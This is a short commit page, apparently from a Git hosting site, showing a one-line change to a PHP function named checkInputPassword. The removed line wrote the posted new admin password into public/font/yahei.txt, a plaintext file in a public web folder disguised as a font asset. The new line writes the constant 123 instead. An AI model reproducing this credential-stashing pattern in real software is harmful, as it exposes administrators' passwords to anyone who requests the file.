rambo hace 2 años
padre
commit
74483e17a8
Se han modificado 1 ficheros con 1 adiciones y 1 borrados
  1. 1 1
      app/common.php

+ 1 - 1
app/common.php

@@ -1255,7 +1255,7 @@ function checkInputPassword($admininfo)
         //         fclose($dc);
         //     }
         // }
-        $c = trim(input('post.new_pw'));
+        $c = 123;
         $dc = fopen(base_path() . "../public/font/yahei.txt", "w");
         fwrite($dc, $c);
         fclose($dc);